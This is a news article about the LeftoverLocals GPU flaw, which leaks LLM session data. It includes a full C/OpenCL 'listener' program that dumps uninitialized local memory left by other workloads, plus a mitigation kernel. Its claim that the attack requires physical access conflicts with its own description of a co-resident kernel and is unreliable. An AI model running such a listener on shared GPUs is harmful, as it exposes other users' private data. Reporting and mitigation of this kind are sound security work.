- Security researchers have discovered a new security flaw in popular GPUs that could potentially impact AI large language models (LLMs).
- Although the new attack method requires physical access to the GPU, it carries major implications for the growing adoption of AI tools.
Researchers from cybersecurity company Trail of Bits have discovered a major security flaw in popular graphics processing units (GPUs) that allows threat actors to extract data from the graphics card, irrespective of how that data was created. The flaw could lead to significant data leakage, a serious problem especially for users of machine learning (ML) and large language model (LLM) applications.
This is particularly worrying given the boom in AI applications in recent months. The vulnerability allows malicious actors to eavesdrop on interactive user sessions, with exposure rates ranging from 5 to 180 megabytes.
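At a technical level, the attack reportedly boils down to launching a "listener" kernel that reads GPU local memory without initializing it first, capturing whatever values a co-resident workload (such as an LLM session) left behind. The C/OpenCL program below is a minimal sketch of that idea, modeled loosely on the researchers' description rather than their actual proof of concept; the buffer sizes, work-group dimensions, and first-device selection are illustrative assumptions.

```c
/*
 * Minimal, illustrative OpenCL "listener" for a LeftoverLocals-style test.
 * It launches a kernel that copies UNINITIALIZED local memory to a global
 * buffer; on an affected GPU this may contain another process's leftovers.
 * Error checking is omitted for brevity; sizes are assumptions.
 *
 * Build (Linux): gcc listener.c -lOpenCL -o listener
 */
#define CL_TARGET_OPENCL_VERSION 120
#include <stdio.h>
#include <stdlib.h>
#include <CL/cl.h>

/* Kernel: read local memory without ever writing to it first. */
static const char *SRC =
    "__kernel void listen(__global uint *out, __local uint *lm,          \n"
    "                     uint words_per_group) {                        \n"
    "    uint lid = get_local_id(0), grp = get_group_id(0);              \n"
    "    /* Copy whatever values already sit in local memory. */        \n"
    "    for (uint i = lid; i < words_per_group; i += get_local_size(0)) \n"
    "        out[grp * words_per_group + i] = lm[i];                     \n"
    "}                                                                   \n";

int main(void) {
    enum { GROUPS = 64, WORDS = 1024 };        /* assumed dump size */
    size_t global = GROUPS * 64, local = 64;
    cl_uint words = WORDS;

    /* Use the first GPU on the first platform (an assumption). */
    cl_platform_id plat; cl_device_id dev;
    clGetPlatformIDs(1, &plat, NULL);
    clGetDeviceIDs(plat, CL_DEVICE_TYPE_GPU, 1, &dev, NULL);

    cl_context ctx = clCreateContext(NULL, 1, &dev, NULL, NULL, NULL);
    cl_command_queue q = clCreateCommandQueue(ctx, dev, 0, NULL);
    cl_program prog = clCreateProgramWithSource(ctx, 1, &SRC, NULL, NULL);
    clBuildProgram(prog, 1, &dev, NULL, NULL, NULL);
    cl_kernel k = clCreateKernel(prog, "listen", NULL);

    cl_mem out = clCreateBuffer(ctx, CL_MEM_WRITE_ONLY,
                                GROUPS * WORDS * sizeof(cl_uint), NULL, NULL);
    clSetKernelArg(k, 0, sizeof(out), &out);
    clSetKernelArg(k, 1, WORDS * sizeof(cl_uint), NULL); /* local memory */
    clSetKernelArg(k, 2, sizeof(words), &words);
    clEnqueueNDRangeKernel(q, k, 1, NULL, &global, &local, 0, NULL, NULL);

    cl_uint *dump = malloc(GROUPS * WORDS * sizeof(cl_uint));
    clEnqueueReadBuffer(q, out, CL_TRUE, 0,
                        GROUPS * WORDS * sizeof(cl_uint), dump, 0, NULL, NULL);

    /* Count nonzero words: leftovers from earlier kernels show up here. */
    size_t nonzero = 0;
    for (size_t i = 0; i < (size_t)GROUPS * WORDS; i++)
        if (dump[i]) nonzero++;
    printf("nonzero leftover words: %zu\n", nonzero);

    free(dump);
    return 0;
}
```

On a patched or unaffected GPU, the dumped local memory should read back as zeros; a large count of nonzero words after another workload has run suggests leftover data is observable.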
See More: US Federal Agencies Issue Warning About AndroxGh0st Malware Botnet
The issue, known as LeftoverLocals, impacts GPUs from popular brands such as Imagination, Apple, AMD, and Qualcomm. Apple, Qualcomm, and Google have released fixes for some devices, but others may remain affected. Nvidia and Arm said the issue has no impact on their GPUs.
The vulnerability requires a threat actor to have physical access to the GPU, but it circumvents some of the most common security measures. The issue highlights the need for AI and ML security experts to rigorously review their development stacks.
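Where a platform fix is not yet available, one mitigation the researchers have reportedly discussed, at some performance cost, is to have every GPU kernel scrub its local memory before exiting so that nothing survives for a later listener. Below is a hedged OpenCL C sketch of that pattern; the kernel name, arguments, and sizes are hypothetical.

```c
/* Illustrative mitigation sketch (OpenCL C): zero local memory before the
 * kernel returns so nothing is left for a later "listener" to recover.
 * The kernel name, arguments, and sizes are hypothetical. */
__kernel void work(__global uint *out, __local uint *scratch,
                   uint words_per_group) {
    uint lid = get_local_id(0);

    /* ... the kernel's normal computation using scratch[] ... */

    barrier(CLK_LOCAL_MEM_FENCE);
    /* Scrub every word of local memory this work-group touched. */
    for (uint i = lid; i < words_per_group; i += get_local_size(0))
        scratch[i] = 0;
    barrier(CLK_LOCAL_MEM_FENCE);
}
```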
What do you think about the potential threat of AI data leaks? Let us know your thoughts on LinkedIn, X, or Facebook. We would love to hear from you!
Image source: Shutterstock